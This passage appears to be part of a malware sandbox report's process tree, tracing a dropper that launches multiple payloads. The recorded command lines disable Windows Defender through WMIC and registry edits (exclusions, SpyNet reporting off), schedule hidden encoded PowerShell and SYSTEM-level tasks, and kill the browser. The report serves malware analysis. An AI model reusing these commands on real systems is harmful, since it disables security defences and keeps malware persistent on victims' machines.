MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
    3⤵
    PID:9372
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:7024
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:9360
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        Blocklisted process makes network request
        
        PID:4568
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:10120
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:924
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:4404
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:8228
- C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ngpfbsEa\FiuyNOb.exe
  C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ngpfbsEa\FiuyNOb.exe vm /S
  2⤵
  - Modifies Internet Explorer settings
  PID:9660
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
    3⤵
    PID:5224
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:6652
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:1304
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        7⤵
        
        PID:2212
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
      4⤵
      PID:8596
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:5432
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:6064
- C:\Users\Admin\AppData\Roaming\heirrsb
  C:\Users\Admin\AppData\Roaming\heirrsb
  2⤵
  - Suspicious use of SetThreadContext
  PID:6684
- - C:\Users\Admin\AppData\Roaming\heirrsb
    C:\Users\Admin\AppData\Roaming\heirrsb
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:2724
- C:\Users\Admin\AppData\Roaming\gbirrsb
  C:\Users\Admin\AppData\Roaming\gbirrsb
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4280
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:6396
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:3736
- C:\Users\Admin\AppData\Roaming\heirrsb
  C:\Users\Admin\AppData\Roaming\heirrsb
  2⤵
  PID:5560
- C:\Users\Admin\AppData\Roaming\gbirrsb
  C:\Users\Admin\AppData\Roaming\gbirrsb
  2⤵
  PID:7648

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1124

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:4508
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  PID:6048

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2544

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1960

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1280

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1272

C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
"C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3908
- C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4164
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu0247e977c7950492a.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4152
  - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu0247e977c7950492a.exe
      Thu0247e977c7950492a.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4352
    - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu0247e977c7950492a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu0247e977c7950492a.exe" -a
        5⤵
        Executes dropped EXE
        
        PID:1536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu0299d0d70a4d322.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu0299d0d70a4d322.exe
      Thu0299d0d70a4d322.exe
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:1084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02483b39590da5492.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu02483b39590da5492.exe
      Thu02483b39590da5492.exe
      4⤵
      Executes dropped EXE
      PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02966ca5c58f270.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4364
  - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu02966ca5c58f270.exe
      Thu02966ca5c58f270.exe
      4⤵
      Executes dropped EXE
      PID:1140
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 1664
        5⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02588bdad8e7.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4264
  - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu02588bdad8e7.exe
      Thu02588bdad8e7.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02d385ff55.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:432
  - - C:\Users\Admin\AppData\Local\Temp\7zS44FA88C2\Thu02d385ff55.exe
      Thu02d385ff55.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      PID:1568
    - - C:\Users\Admin\Documents\fWgMVB1vAcglaCQQ59Jnh1kc.exe
        
        "C:\Users\Admin\Documents\fWgMVB1vAcglaCQQ59Jnh1kc.exe"
        5⤵
        Executes dropped EXE
        
        PID:1076
    - - C:\Users\Admin\Documents\nHfqbSz1R7yMeq2emrExLe3i.exe
        
        "C:\Users\Admin\Documents\nHfqbSz1R7yMeq2emrExLe3i.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:2788
    - - C:\Users\Admin\Documents\LWXqQWGhbYeLu_Ndr21gE_Lt.exe
        
        "C:\Users\Admin\Documents\LWXqQWGhbYeLu_Ndr21gE_Lt.exe"
        5⤵
        Executes dropped EXE
        
        PID:2776
      - C:\Users\Admin\AppData\Roaming\6854844.scr
        
        "C:\Users\Admin\AppData\Roaming\6854844.scr" /S
        6⤵
        
        PID:5592
      - C:\Users\Admin\AppData\Roaming\3740841.scr
        
        "C:\Users\Admin\AppData\Roaming\3740841.scr" /S
        6⤵
        
        PID:5868
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:4856
      - C:\Users\Admin\AppData\Roaming\3496651.scr
        
        "C:\Users\Admin\AppData\Roaming\3496651.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:6108
      - C:\Users\Admin\AppData\Roaming\7074312.scr
        
        "C:\Users\Admin\AppData\Roaming\7074312.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1568
      - C:\Users\Admin\AppData\Roaming\4178082.scr
        
        "C:\Users\Admin\AppData\Roaming\4178082.scr" /S
        6⤵
        
        PID:6400
    - - C:\Users\Admin\Documents\lLbXCz7SXYXsjA6c_OOLkbta.exe
        
        "C:\Users\Admin\Documents\lLbXCz7SXYXsjA6c_OOLkbta.exe"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4816
    - - C:\Users\Admin\Documents\xVdu0PKqy9HPt_Tb7vOzNsvr.exe
        
        "C:\Users\Admin\Documents\xVdu0PKqy9HPt_Tb7vOzNsvr.exe"
        5⤵
        Executes dropped EXE
        
        PID:2348
      - C:\Users\Admin\AppData\Local\Temp\7zS8634.tmp\Install.exe
        
        .\Install.exe
        6⤵
        Executes dropped EXE
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\7zSB89E.tmp\Install.exe
        
        .\Install.exe /S /site_id "394347"
        7⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:6056
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
        8⤵
        
        PID:5464
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
        9⤵
        
        PID:4672
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        12⤵
        
        PID:7208
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
        9⤵
        
        PID:8284
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:6984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        12⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
        9⤵
        
        PID:9332
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:8604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        12⤵
        
        PID:1036
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
        9⤵
        Modifies data under HKEY_USERS
        
        PID:9592
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        10⤵
        
        PID:9964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        11⤵
        
        PID:1148
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        12⤵
        
        PID:6656
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4128
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        9⤵
        
        PID:6440
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        10⤵
        
        PID:6420
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        10⤵
        
        PID:6156
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        8⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        9⤵
        
        PID:6432
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        10⤵
        
        PID:5420
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        10⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gmiDHkdys" /SC once /ST 18:49:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        8⤵
        Creates scheduled task(s)
        
        PID:6628
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gmiDHkdys"
        8⤵
        
        PID:6320
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gmiDHkdys"
        8⤵
        
        PID:7844
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 20:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\fENUqIS.exe\" uG /site_id 394347 /S" /V1 /F
        8⤵
        Creates scheduled task(s)
        
        PID:7264
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bvmcjEjDUxHOOxIZsK"
        8⤵
        
        PID:10236
    - - C:\Users\Admin\Documents\QRApRPI7Ivggnr9ZbkFZa5lY.exe
        
        "C:\Users\Admin\Documents\QRApRPI7Ivggnr9ZbkFZa5lY.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1780
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:6984
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:6856
    - - C:\Users\Admin\Documents\hLRux0VFcRke45Fz8bd8YS8m.exe
        
        "C:\Users\Admin\Documents\hLRux0VFcRke45Fz8bd8YS8m.exe"
        5⤵
        Executes dropped EXE
        
        PID:3432
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        6⤵
        
        PID:4276
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        7⤵
        Checks processor information in registry
        
        PID:5320
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        6⤵
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:6988
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff9021d4f50,0x7ff9021d4f60,0x7ff9021d4f70
        7⤵
        
        PID:6824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1824 /prefetch:2
        7⤵
        
        PID:3984
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2144 /prefetch:8
        7⤵
        
        PID:4876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1880 /prefetch:8
        7⤵
        
        PID:868
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,17042739704315761160,11363993669412515081,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2580 /prefetch:1
        7⤵
        
        PID:4276
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
